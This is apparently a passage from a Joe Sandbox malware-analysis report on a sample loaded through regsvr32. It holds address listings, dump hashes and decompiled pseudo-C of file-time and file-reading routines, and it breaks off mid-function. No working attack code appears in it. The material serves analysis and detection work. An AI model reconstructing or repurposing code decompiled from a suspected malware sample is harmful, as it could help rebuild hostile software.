                                                                              0x10035ec3
                                                                              0x10035ecb
                                                                              0x10035ecf
                                                                              0x10035ee2
                                                                              0x10035ef3
                                                                              0x10035f01
                                                                              0x10035f08
                                                                              0x10035f12
                                                                              0x10035f17
                                                                              0x10035f1a
                                                                              0x10035f1a
                                                                              0x10035f1f
                                                                              0x10035f2f
                                                                              0x10035f66
                                                                              0x10035f6f
                                                                              0x10035f31
                                                                              0x10035f31
                                                                              0x10035f3a
                                                                              0x10035f49
                                                                              0x10035f4f
                                                                              0x10035f54
                                                                              0x10035f58
                                                                              0x10035f5d
                                                                              0x10035f5d
                                                                              0x10035f7a
                                                                              0x10036013
                                                                              0x100364e6
                                                                              0x100364ee
                                                                              0x100364f0
                                                                              0x100364f9
                                                                              0x10036501
                                                                              0x10036508
                                                                              0x1003650b
                                                                              0x10036510
                                                                              0x10036514
                                                                              0x10036519
                                                                              0x10036520
                                                                              0x1003652d
                                                                              0x10036530
                                                                              0x10036535
                                                                              0x1003653f
                                                                              0x10036545
                                                                              0x1003654e
                                                                              0x10036563
                                                                              0x10036565
                                                                              0x1003656b
                                                                              0x1003656b
                                                                              0x10036578
                                                                              0x1003657a
                                                                              0x10036587
                                                                              0x1003658a
                                                                              0x1003658d
                                                                              0x1003658d
                                                                              0x10036595
                                                                              0x10036595
                                                                              0x00000000
                                                                              0x10036578
                                                                              0x10036019
                                                                              0x1003602f
                                                                              0x10036045
                                                                              0x10036050
                                                                              0x10036057
                                                                              0x10036061
                                                                              0x10036066
                                                                              0x10036069
                                                                              0x10036069
                                                                              0x1003606e
                                                                              0x10036077
                                                                              0x1003607f
                                                                              0x10036083
                                                                              0x10036097
                                                                              0x100360a8
                                                                              0x100360b6
                                                                              0x100360bd
                                                                              0x100360c7
                                                                              0x100360cc
                                                                              0x100360cf
                                                                              0x100360cf
                                                                              0x100360d2
                                                                              0x100360de
                                                                              0x100364df
                                                                              0x100364df
                                                                              0x00000000
                                                                              0x100360e4
                                                                              0x100360e4
                                                                              0x100360e7
                                                                              0x100360f2
                                                                              0x00000000
                                                                              0x1003610c
                                                                              0x1003610c
                                                                              0x1003611f
                                                                              0x1003612d
                                                                              0x1003613b
                                                                              0x10036142
                                                                              0x1003614c
                                                                              0x10036154
                                                                              0x10036154
                                                                              0x10036157
                                                                              0x1003615f
                                                                              0x10036163
                                                                              0x10036173
                                                                              0x10036184
                                                                              0x1003618f
                                                                              0x10036196
                                                                              0x100361a0
                                                                              0x100361a5
                                                                              0x100361a8
                                                                              0x100361a8
                                                                              0x100361ab
                                                                              0x100361be
                                                                              0x100361d4
                                                                              0x100361dc
                                                                              0x100361e3
                                                                              0x100361ed
                                                                              0x100361f2
                                                                              0x100361f5
                                                                              0x100361f5
                                                                              0x100361fa
                                                                              0x10036203
                                                                              0x1003620b
                                                                              0x1003620f
                                                                              0x10036220
                                                                              0x10036231
                                                                              0x1003623c
                                                                              0x10036243
                                                                              0x1003624d
                                                                              0x10036252
                                                                              0x10036255
                                                                              0x10036255
                                                                              0x10036258
                                                                              0x10036264
                                                                              0x100364d8
                                                                              0x100364d8
                                                                              0x00000000
                                                                              0x1003626a
                                                                              0x1003626a
                                                                              0x1003626d
                                                                              0x10036278
                                                                              0x00000000
                                                                              0x10036292
                                                                              0x10036292
                                                                              0x100362a5
                                                                              0x100362b3
                                                                              0x100362c1
                                                                              0x100362c8
                                                                              0x100362d2
                                                                              0x100362da
                                                                              0x100362da
                                                                              0x100362dd
                                                                              0x100362e5
                                                                              0x100362e9
                                                                              0x100362fc
                                                                              0x1003630d
                                                                              0x1003631b
                                                                              0x10036322
                                                                              0x1003632c
                                                                              0x10036331
                                                                              0x10036334
                                                                              0x10036334
                                                                              0x10036337
                                                                              0x1003634d
                                                                              0x10036363
                                                                              0x1003636e
                                                                              0x10036375
                                                                              0x1003637f
                                                                              0x10036384
                                                                              0x10036387
                                                                              0x10036387
                                                                              0x1003638c
                                                                              0x10036395
                                                                              0x1003639d
                                                                              0x100363a1
                                                                              0x100363b5
                                                                              0x100363c6
                                                                              0x100363d4
                                                                              0x100363db
                                                                              0x100363e5
                                                                              0x100363ea
                                                                              0x100363ed
                                                                              0x100363ed
                                                                              0x100363f0
                                                                              0x100363fc
                                                                              0x100364d1
                                                                              0x100364d1
                                                                              0x00000000
                                                                              0x10036402
                                                                              0x10036402
                                                                              0x10036405
                                                                              0x10036410
                                                                              0x00000000
                                                                              0x1003642a
                                                                              0x1003642a
                                                                              0x1003643d
                                                                              0x1003644b
                                                                              0x10036459
                                                                              0x10036460
                                                                              0x1003646a
                                                                              0x10036472
                                                                              0x10036472
                                                                              0x10036475
                                                                              0x1003647d
                                                                              0x10036481
                                                                              0x10036494
                                                                              0x100364a5
                                                                              0x100364b3
                                                                              0x100364ba
                                                                              0x100364c4
                                                                              0x100364c9
                                                                              0x100364cc
                                                                              0x100364cc
                                                                              0x00000000
                                                                              0x100364c4
                                                                              0x10036410
                                                                              0x1003638e
                                                                              0x1003638e
                                                                              0x00000000
                                                                              0x1003638e
                                                                              0x1003638c
                                                                              0x10036278
                                                                              0x100361fc
                                                                              0x100361fc
                                                                              0x00000000
                                                                              0x100361fc
                                                                              0x100361fa
                                                                              0x100360f2
                                                                              0x10036070
                                                                              0x10036070
                                                                              0x00000000
                                                                              0x10036070
                                                                              0x10035f80
                                                                              0x10035f80
                                                                              0x10035f89
                                                                              0x10035f8d
                                                                              0x10035f96
                                                                              0x10035f9f
                                                                              0x10035fa9
                                                                              0x10035fb1
                                                                              0x10035fb6
                                                                              0x10035fb6
                                                                              0x10035fb9
                                                                              0x10035fbe
                                                                              0x10035fc6
                                                                              0x10035fcc
                                                                              0x10035fcc
                                                                              0x10035fd2
                                                                              0x10035fdb
                                                                              0x10035fe3
                                                                              0x10035ff0
                                                                              0x10035ff2
                                                                              0x10035ff4
                                                                              0x10035ff4
                                                                              0x10035ff9
                                                                              0x10036002
                                                                              0x1003659b
                                                                              0x1003659b
                                                                              0x100365a4
                                                                              0x100365b0
                                                                              0x100365be
                                                                              0x100365c5
                                                                              0x100365cf
                                                                              0x100365d7
                                                                              0x100365d7
                                                                              0x100365db
                                                                              0x00000000
                                                                              0x100365db
                                                                              0x10035f7a
                                                                              0x10035e5e

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$ForegroundIconicPostSendWindow
                                                                              • String ID: ","$[open("$[print("$[printto("
                                                                              • API String ID: 1754155607-3790869113
                                                                              • Opcode ID: c693f081b01157d5d4a1511b89a9e192593ff2e0d2753a88bb44c423a5d03cda
                                                                              • Instruction ID: b958da805477a7f96738e5da8f1b62242005d25b02b0ea3eeeb684c7c25c4e67
                                                                              • Opcode Fuzzy Hash: c693f081b01157d5d4a1511b89a9e192593ff2e0d2753a88bb44c423a5d03cda
                                                                              • Instruction Fuzzy Hash: 30428076301E8486CA21DF29D84539E73A0FBC5BE2F4082229A6D5B7E5EF7CD885C740
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10030FE0 Relevance: 13.6, APIs: 9, Instructions: 107timefilestringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 34%
                                                                              			E10030FE0(void* __edi, void* __rcx, long long* __rdx, void* __r8, void* __r9, void* __r10) {
				signed int _v40;
				intOrPtr* _v600;
				char _v612;
				char _v620;
				char _v628;
				signed int _v632;
				void* _v656;
				char _v664;
				short _t39;
				void* _t52;
				void* _t53;
				void* _t54;
				signed long long _t57;
				signed long long _t58;
				intOrPtr* _t59;
				long long* _t63;
				signed long long _t94;

				_t97 = __r10;
				_t54 = __edi;
				_t57 =  *0x1006f4c8; // 0x6f13091946cb
				_t58 = _t57 ^ _t94;
				_v40 = _t58;
				_t63 = __rdx;
				if(__rcx != 0) {
					if(lstrlenW() >= 0x104) {
						goto L1;
					} else {
						_t2 = _t63 + 0x22; // 0x22
						_t39 = E10030654(_t52, _t2, __rcx, __r8);
						if(_t39 != 0) {
							FindFirstFileW();
							if(_t58 == 0xffffffff) {
								goto L1;
							} else {
								FindClose();
								r11b = _v632;
								_t59 = _v600;
								r11b = r11b & 0x0000007f;
								 *(__rdx + 0x20) = r11b;
								 *((long long*)(__rdx + 0x18)) = _t59;
								if(FileTimeToLocalFileTime(??, ??) == 0 || FileTimeToSystemTime() == 0) {
									 *_t63 = 0;
								} else {
									r8d = __edi;
									E10030F2C(_t53,  &_v664,  &_v628, __r10);
									 *__rdx =  *_t59;
								}
								if(FileTimeToLocalFileTime() == 0 || FileTimeToSystemTime() == 0) {
									 *((long long*)(_t63 + 0x10)) = 0;
								} else {
									r8d = _t54;
									E10030F2C(_t53,  &_v664,  &_v620, _t97);
									_t59 =  *_t59;
									 *((long long*)(_t63 + 0x10)) = _t59;
								}
								if(FileTimeToLocalFileTime() == 0 || FileTimeToSystemTime() == 0) {
									 *((long long*)(_t63 + 8)) = 0;
								} else {
									r8d = _t54;
									E10030F2C(_t53,  &_v664,  &_v612, _t97);
									 *((long long*)(_t63 + 8)) =  *_t59;
								}
								if( *_t63 == 0) {
									 *_t63 =  *((intOrPtr*)(_t63 + 8));
								}
								if( *((long long*)(_t63 + 0x10)) == 0) {
									 *((long long*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + 8));
								}
							}
						} else {
							 *((short*)(__rdx + 0x22)) = _t39;
							goto L1;
						}
					}
				} else {
					L1:
				}
				return E10038D20(_t52, _v40 ^ _t94);
			}




















                                                                              0x10030fe0
                                                                              0x10030fe0
                                                                              0x10030feb
                                                                              0x10030ff2
                                                                              0x10030ff5
                                                                              0x10031000
                                                                              0x10031006
                                                                              0x1003101a
                                                                              0x00000000
                                                                              0x1003101c
                                                                              0x1003101c
                                                                              0x10031023
                                                                              0x1003102a
                                                                              0x1003103a
                                                                              0x1003104a
                                                                              0x00000000
                                                                              0x1003104c
                                                                              0x1003104f
                                                                              0x10031055
                                                                              0x1003105a
                                                                              0x1003105f
                                                                              0x1003106d
                                                                              0x10031071
                                                                              0x1003107d
                                                                              0x100310ad
                                                                              0x10031093
                                                                              0x1003109d
                                                                              0x100310a0
                                                                              0x100310a8
                                                                              0x100310a8
                                                                              0x100310c6
                                                                              0x100310f7
                                                                              0x100310dc
                                                                              0x100310e6
                                                                              0x100310e9
                                                                              0x100310ee
                                                                              0x100310f1
                                                                              0x100310f1
                                                                              0x10031111
                                                                              0x10031142
                                                                              0x10031127
                                                                              0x10031131
                                                                              0x10031134
                                                                              0x1003113c
                                                                              0x1003113c
                                                                              0x1003114e
                                                                              0x10031154
                                                                              0x10031154
                                                                              0x1003115c
                                                                              0x10031162
                                                                              0x10031162
                                                                              0x10031166
                                                                              0x1003102c
                                                                              0x1003102c
                                                                              0x00000000
                                                                              0x1003102c
                                                                              0x1003102a
                                                                              0x10031008
                                                                              0x10031008
                                                                              0x10031008
                                                                              0x10031185

                                                                              APIs
                                                                              • lstrlenW.KERNEL32 ref: 1003100F
                                                                              • FindFirstFileW.KERNEL32 ref: 1003103A
                                                                              • FindClose.KERNEL32 ref: 1003104F
                                                                              • FileTimeToLocalFileTime.KERNEL32 ref: 10031075
                                                                              • FileTimeToSystemTime.KERNEL32 ref: 10031089
                                                                              • FileTimeToLocalFileTime.KERNEL32 ref: 100310BE
                                                                              • FileTimeToSystemTime.KERNEL32 ref: 100310D2
                                                                              • FileTimeToLocalFileTime.KERNEL32 ref: 10031109
                                                                              • FileTimeToSystemTime.KERNEL32 ref: 1003111D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$LocalSystem$Find$CloseFirstlstrlen
                                                                              • String ID:
                                                                              • API String ID: 550468923-0
                                                                              • Opcode ID: e1ecb9719216fbf009e9014b8c719ef1e2e9da3f918b3cd13fe318df982673ca
                                                                              • Instruction ID: e8174bdf739fc9ecb1dd896aff110d188ba380c80b9c9c7e6cbc292bf875e48a
                                                                              • Opcode Fuzzy Hash: e1ecb9719216fbf009e9014b8c719ef1e2e9da3f918b3cd13fe318df982673ca
                                                                              • Instruction Fuzzy Hash: 10415A36305B8585DB22CF21E8903E973B0F78DBD9F814111DA8D4B668EFB8C699CB01
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10050F80 Relevance: 12.5, APIs: 8, Instructions: 541fileCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E10050F80(void* __eax, signed int __ecx, signed int __edi, void* __ebp, long long __rbx, signed int __rdx, long long __rdi, long long __rsi, long long __r12, long long __r13, long long __r14, long long __r15) {
				signed int _t259;
				signed char _t260;
				signed int _t265;
				long _t266;
				signed int _t272;
				signed int _t274;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t289;
				signed int _t290;
				signed int _t293;
				signed int _t295;
				signed int _t298;
				signed int _t314;
				unsigned int _t315;
				signed int _t320;
				signed int _t324;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t336;
				signed int _t338;
				signed int _t344;
				signed int _t346;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed char* _t359;
				signed int _t360;
				void* _t364;
				intOrPtr _t365;
				intOrPtr _t367;
				signed int _t383;
				signed char* _t385;
				void* _t391;
				signed char* _t392;
				signed long long _t393;
				signed long long _t394;
				long long _t396;
				void* _t397;
				void* _t398;
				void* _t400;
				signed int _t406;
				signed long long _t410;
				long long _t412;

				_t412 = __r14;
				_t389 = __rsi;
				_t376 = __rdx;
				_t354 = __rbx;
				_t344 = __edi;
				 *((long long*)(_t397 + 0x10)) = __rdx;
				 *((intOrPtr*)(_t397 + 8)) = __ecx;
				 *((long long*)(_t397 + 0x98)) = __rbx;
				 *((long long*)(_t397 + 0x60)) = __rdi;
				_t352 = __ecx;
				 *((long long*)(_t397 + 0x48)) = __r14;
				_t314 = r8d;
				_t351 = __eax - __edi;
				 *(_t397 + 0x38) = r8d;
				if(__eax != __edi) {
					__eflags = __ecx;
					if(__eflags < 0) {
						L139:
						E1003AF70(__eflags, _t352);
						r14d = 0;
						 *_t352 = r14d;
						E1003AF40(_t352);
						r9d = 0;
						r8d = 0;
						 *_t352 = 9;
						 *((long long*)(_t397 + 0x20)) = _t412;
						E1003C790(_t354, _t364, _t376, 0xfffffffe, _t389, _t393, _t398);
						_t254 = _t412 - 1; // -1
						_t259 = _t254;
						goto L20;
					}
					__eflags = __eax -  *0x10077288;
					if(__eflags >= 0) {
						goto L139;
					}
					 *(_t397 + 0x70) = _t393;
					bpl = __eax;
					 *((long long*)(_t397 + 0x50)) = __r13;
					_t399 = 0x10000000;
					_t410 = __ecx >> 5;
					_t394 = _t393 << 6;
					_t365 =  *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8));
					_t260 =  *(_t365 + _t394 + 8) & 0x000000ff;
					__eflags = _t260 & 0x00000001;
					if(__eflags != 0) {
						r14d = 0;
						__eflags = _t314;
						 *((long long*)(_t397 + 0x68)) = __rsi;
						_t346 = r14d;
						if(_t314 == 0) {
							L138:
							_t259 = 0;
							L18:
							goto L19;
						}
						__eflags = _t260 & 0x00000002;
						if((_t260 & 0x00000002) != 0) {
							goto L138;
						}
						__eflags = __rdx;
						if(__eflags != 0) {
							 *((long long*)(_t397 + 0x58)) = __r12;
							 *((long long*)(_t397 + 0x40)) = __r15;
							r15d =  *(_t365 + _t394 + 0x38) & 0x000000ff;
							r15b = r15b + r15b;
							r15b = r15b >> 1;
							_t320 = r15b - 1;
							__eflags = _t320;
							if(_t320 == 0) {
								__eflags =  !_t314 & 0x00000001;
								if(__eflags != 0) {
									_t315 = _t314 >> 1;
									__eflags = _t315 - 4;
									_t314 =  <  ? 4 : _t315;
									E1003D3A0(_t314, __ecx, __rbx, _t365, 0xfffffffe, __rsi, _t394);
									__eflags = _t352;
									_t406 = _t352;
									if(_t352 != 0) {
										_t399 = 0x10000000;
										L24:
										_t353 =  *((intOrPtr*)(_t399 + 0x772a0 + _t410 * 8));
										_t377 = _t406;
										__eflags = _t353[_t394 + 8] & 0x00000048;
										if((_t353[_t394 + 8] & 0x00000048) != 0) {
											_t329 = _t353[_t394 + 9] & 0x000000ff;
											__eflags = _t329 - 0xa;
											if(_t329 != 0xa) {
												__eflags = _t314;
												if(_t314 != 0) {
													 *_t406 = _t329;
													_t353 =  *((intOrPtr*)(_t399 + 0x772a0 + _t410 * 8));
													_t314 = _t314 + 0xffffffff;
													__eflags = r15b;
													_t56 = _t406 + 1; // 0x1
													_t377 = _t56;
													_t346 = 1;
													_t353[_t394 + 9] = 0xa;
													if(r15b != 0) {
														_t353 =  *((intOrPtr*)(_t399 + 0x772a0 + _t410 * 8));
														_t330 = _t353[_t394 + 0x39] & 0x000000ff;
														__eflags = _t330 - 0xa;
														if(_t330 != 0xa) {
															__eflags = _t314;
															if(_t314 != 0) {
																 *_t377 = _t330;
																_t353 =  *((intOrPtr*)(_t399 + 0x772a0 + _t410 * 8));
																_t377 = _t377 + _t389;
																_t314 = _t314 + 0xffffffff;
																__eflags = r15b - 1;
																_t346 = 2;
																_t353[_t394 + 0x39] = 0xa;
																if(r15b == 1) {
																	_t353 =  *((intOrPtr*)(_t399 + 0x772a0 + _t410 * 8));
																	_t331 = _t353[_t394 + 0x3a] & 0x000000ff;
																	__eflags = _t331 - 0xa;
																	if(_t331 != 0xa) {
																		__eflags = _t314;
																		if(_t314 != 0) {
																			 *_t377 = _t331;
																			_t353 =  *((intOrPtr*)(_t399 + 0x772a0 + _t410 * 8));
																			_t377 = _t377 + 1;
																			_t346 = 3;
																			_t314 = _t314 + 0xffffffff;
																			__eflags = _t314;
																			_t353[_t394 + 0x3a] = 0xa;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
										r8d = _t314;
										_t367 =  *((intOrPtr*)( *((intOrPtr*)(_t399 + 0x772a0 + _t410 * 8)) + _t394));
										 *((long long*)(_t397 + 0x20)) = _t412;
										_t265 = ReadFile(??, ??, ??, ??, ??);
										__eflags = _t265;
										if(_t265 == 0) {
											L127:
											_t266 = GetLastError();
											__eflags = _t266 - 5;
											if(_t266 != 5) {
												__eflags = _t266 - 0x6d;
												if(__eflags != 0) {
													E1003AFA0(_t266, __eflags, _t353, _t377);
													_t396 =  *((intOrPtr*)(_t397 + 0x88));
													_t344 = 0xffffffff;
												} else {
													_t396 =  *((intOrPtr*)(_t397 + 0x88));
													_t344 = r14d;
												}
											} else {
												E1003AF40(_t353);
												 *_t353 = 9;
												E1003AF70(__eflags, _t353);
												_t396 =  *((intOrPtr*)(_t397 + 0x88));
												 *_t353 = 5;
												_t344 = 0xffffffff;
											}
											L135:
											__eflags = _t406 - _t396;
											if(_t406 != _t396) {
												E10039620(_t353, _t406);
											}
											__eflags = _t344 - 0xfffffffe;
											_t345 =  ==  ? _t346 : _t344;
											_t259 =  ==  ? _t346 : _t344;
											goto L17;
										}
										_t377 =  *((intOrPtr*)(_t397 + 0x34));
										__eflags = _t336;
										if(_t336 < 0) {
											goto L127;
										}
										__eflags = _t377 - _t353;
										if(_t377 > _t353) {
											goto L127;
										}
										_t400 = 0x10000000;
										_t346 = _t346 + _t336;
										_t353 =  *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8));
										__eflags = _t353[_t394 + 8] & 0x00000080;
										if((_t353[_t394 + 8] & 0x00000080) == 0) {
											_t396 =  *((intOrPtr*)(_t397 + 0x88));
											goto L135;
										}
										__eflags = r15b - 2;
										if(r15b == 2) {
											__eflags = _t336;
											if(_t336 == 0) {
												L97:
												_t186 =  &(_t353[_t394 + 8]);
												 *_t186 = _t353[_t394 + 8] & 0x000000fb;
												__eflags =  *_t186;
												L98:
												_t353 = _t346;
												_t356 = _t406;
												_t383 = _t406;
												_t391 = _t346 + _t406;
												__eflags = _t406 - _t391;
												if(_t406 >= _t391) {
													L126:
													_t396 =  *((intOrPtr*)(_t397 + 0x88));
													_t346 = _t314 - r12d;
													goto L135;
												}
												while(1) {
													_t272 =  *_t383 & 0x0000ffff;
													__eflags = _t272 - 0x1a;
													if(_t272 == 0x1a) {
														break;
													}
													__eflags = _t272 - 0xd;
													if(_t272 == 0xd) {
														_t191 = _t391 - 2; // -2
														_t353 = _t191;
														__eflags = _t383 - _t191;
														if(_t383 >= _t191) {
															r8d = 2;
															_t383 = _t383 + 2;
															 *((long long*)(_t397 + 0x20)) = _t412;
															_t274 = ReadFile(??, ??, ??, ??, ??);
															__eflags = _t274;
															if(_t274 != 0) {
																L109:
																__eflags =  *((intOrPtr*)(_t397 + 0x34)) - r14d;
																if( *((intOrPtr*)(_t397 + 0x34)) == r14d) {
																	L119:
																	 *_t356 = 0xd;
																	_t356 = _t356 + 2;
																	_t400 = 0x10000000;
																	L121:
																	__eflags = _t383 - _t391;
																	if(_t383 < _t391) {
																		continue;
																	}
																	goto L126;
																}
																_t400 = 0x10000000;
																_t353 =  *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8));
																__eflags = _t353[_t394 + 8] & 0x00000048;
																if((_t353[_t394 + 8] & 0x00000048) == 0) {
																	__eflags = _t356 - _t406;
																	if(__eflags != 0) {
																		L117:
																		r8d = 1;
																		E100488B0(_t314,  *((intOrPtr*)(_t397 + 0x80)), _t336, __eflags, _t353, _t356, 0xfffffffe, _t383, _t391, _t394, _t400);
																		__eflags =  *(_t397 + 0x30) - 0xa;
																		if( *(_t397 + 0x30) == 0xa) {
																			_t400 = 0x10000000;
																		} else {
																			 *_t356 = 0xd;
																			_t356 = _t356 + 2;
																			_t400 = 0x10000000;
																		}
																		goto L121;
																	}
																	__eflags =  *(_t397 + 0x30) - 0xa;
																	if(__eflags != 0) {
																		goto L117;
																	}
																	 *_t356 = 0xa;
																	_t356 = _t356 + 2;
																	goto L121;
																}
																__eflags =  *(_t397 + 0x30) - 0xa;
																if( *(_t397 + 0x30) != 0xa) {
																	 *_t356 = 0xd;
																	 *((char*)( *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8)) + _t394 + 9)) =  *(_t397 + 0x30) & 0x000000ff;
																	 *((char*)( *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8)) + _t394 + 0x39)) =  *(_t397 + 0x31) & 0x000000ff;
																	_t353 =  *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8));
																	_t356 = _t356 + 2;
																	 *((char*)( *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8)) + _t394 + 0x3a)) = 0xa;
																} else {
																	 *_t356 = 0xa;
																	_t356 = _t356 + 2;
																}
																goto L121;
															}
															_t278 = GetLastError();
															__eflags = _t278;
															if(_t278 != 0) {
																goto L119;
															}
															goto L109;
														}
														__eflags =  *(_t383 + 2) - 0xa;
														_t193 = _t383 + 2; // 0x2
														_t353 = _t193;
														if( *(_t383 + 2) != 0xa) {
															 *_t356 = 0xd;
															_t356 = _t356 + 2;
															_t383 = _t353;
														} else {
															_t383 = _t383 + 4;
															 *_t356 = 0xa;
															_t356 = _t356 + 2;
														}
														goto L121;
													}
													 *_t356 = _t272;
													_t356 = _t356 + 2;
													_t383 = _t383 + 2;
													goto L121;
												}
												_t353 =  *((intOrPtr*)(_t400 + 0x772a0 + _t410 * 8));
												__eflags = _t353[_t394 + 8] & 0x00000040;
												if((_t353[_t394 + 8] & 0x00000040) != 0) {
													_t357 = _t356 + 2;
													__eflags = _t357;
													 *((short*)(_t357 - 2)) =  *_t383 & 0x0000ffff;
												} else {
													_t353[_t394 + 8] = _t353[_t394 + 8] | 0x00000002;
												}
												goto L126;
											}
											__eflags =  *_t406 - 0xa;
											if( *_t406 != 0xa) {
												goto L97;
											}
											_t353[_t394 + 8] = _t353[_t394 + 8] | 0x00000004;
											goto L98;
										}
										__eflags = _t336;
										if(_t336 == 0) {
											L42:
											_t98 =  &(_t353[_t394 + 8]);
											 *_t98 = _t353[_t394 + 8] & 0x000000fb;
											__eflags =  *_t98;
											L43:
											_t353 = _t346;
											_t358 = _t406;
											_t385 = _t406;
											_t392 =  &(_t353[_t406]);
											__eflags = _t406 - _t392;
											if(_t406 >= _t392) {
												L71:
												_t346 = _t314 - r12d;
												__eflags = r15b - 1;
												if(r15b != 1) {
													_t396 =  *((intOrPtr*)(_t397 + 0x88));
													goto L135;
												}
												__eflags = _t346;
												if(_t346 == 0) {
													_t396 =  *((intOrPtr*)(_t397 + 0x88));
													goto L135;
												}
												_t279 =  *(_t358 - 1);
												_t359 = _t358 - 1;
												__eflags = _t279;
												if(_t279 < 0) {
													_t338 = 1;
													__eflags = _t353[_t400 + 0x70a20] - r14b;
													if(_t353[_t400 + 0x70a20] != r14b) {
														L80:
														_t324 =  *_t359 & 0x000000ff;
														_t281 =  *((char*)(_t367 + _t400 + 0x70a20));
														__eflags = _t281;
														if(_t281 != 0) {
															__eflags = _t281 + 1 - _t338;
															if(_t281 + 1 != _t338) {
																_t353 =  *((intOrPtr*)(_t400 + 0x772a0 + _t410 * 8));
																__eflags = _t353[_t394 + 8] & 0x00000048;
																if(__eflags == 0) {
																	r8d = 1;
																	_t377 =  ~_t338;
																	E100488B0(_t314,  *((intOrPtr*)(_t397 + 0x80)),  ~_t338, __eflags, _t353, _t359,  ~_t338, _t385, _t392, _t394, _t400);
																} else {
																	_t360 =  &(_t359[1]);
																	__eflags = _t338 - 2;
																	_t353[_t394 + 9] = _t324;
																	if(_t338 >= 2) {
																		_t290 =  *_t360 & 0x000000ff;
																		_t360 = _t360 + 1;
																		__eflags = _t360;
																		 *( *((intOrPtr*)(_t400 + 0x772a0 + _t410 * 8)) + _t394 + 0x39) = _t290;
																	}
																	__eflags = _t338 - 3;
																	if(_t338 == 3) {
																		_t289 =  *_t360 & 0x000000ff;
																		__eflags = _t360;
																		 *( *((intOrPtr*)(_t400 + 0x772a0 + _t410 * 8)) + _t394 + 0x3a) = _t289;
																	}
																	_t353 = _t338;
																}
															} else {
																_t353 = _t338;
															}
															L91:
															_t396 =  *((intOrPtr*)(_t397 + 0x88));
															r9d = _t314 - r12d;
															 *(_t397 + 0x28) =  *(_t397 + 0x38) >> 1;
															 *((long long*)(_t397 + 0x20)) = _t396;
															_t286 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
															__eflags = _t286;
															_t346 = _t286;
															if(__eflags != 0) {
																_t346 = _t346 + _t346;
															} else {
																E1003AFA0(GetLastError(), __eflags, _t353, _t377);
																_t181 = _t392 - 1; // -1
																_t344 = _t181;
															}
															goto L135;
														}
														E1003AF40(_t353);
														_t396 =  *((intOrPtr*)(_t397 + 0x88));
														_t344 = 0xffffffff;
														 *_t353 = 0x2a;
														goto L135;
													}
													while(1) {
														__eflags = _t338 - 4;
														if(_t338 > 4) {
															goto L80;
														}
														__eflags = _t359 - _t406;
														if(_t359 < _t406) {
															goto L80;
														}
														_t359 = _t359 - 1;
														_t338 = _t338 + 1;
														__eflags = _t353[_t400 + 0x70a20] - r14b;
														if(_t353[_t400 + 0x70a20] == r14b) {
															continue;
														}
														goto L80;
													}
													goto L80;
												}
												goto L91;
											} else {
												while(1) {
													_t293 =  *_t385 & 0x000000ff;
													__eflags = _t293 - 0x1a;
													if(_t293 == 0x1a) {
														break;
													}
													__eflags = _t293 - 0xd;
													if(_t293 == 0xd) {
														_t103 = _t392 - 1; // -1
														_t353 = _t103;
														__eflags = _t385 - _t353;
														if(_t385 >= _t353) {
															_t377 = _t397 + 0x90;
															_t367 =  *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x772a0 + _t410 * 8)) + _t394));
															r8d = 1;
															_t385 =  &(_t385[1]);
															 *((long long*)(_t397 + 0x20)) = _t412;
															_t295 = ReadFile(??, ??, ??, ??, ??);
															__eflags = _t295;
															if(_t295 != 0) {
																L54:
																__eflags =  *((intOrPtr*)(_t397 + 0x34)) - r14d;
																if( *((intOrPtr*)(_t397 + 0x34)) == r14d) {
																	L64:
																	 *_t358 = 0xd;
																	_t358 = _t358 + 1;
																	_t400 = 0x10000000;
																	goto L66;
																}
																_t400 = 0x10000000;
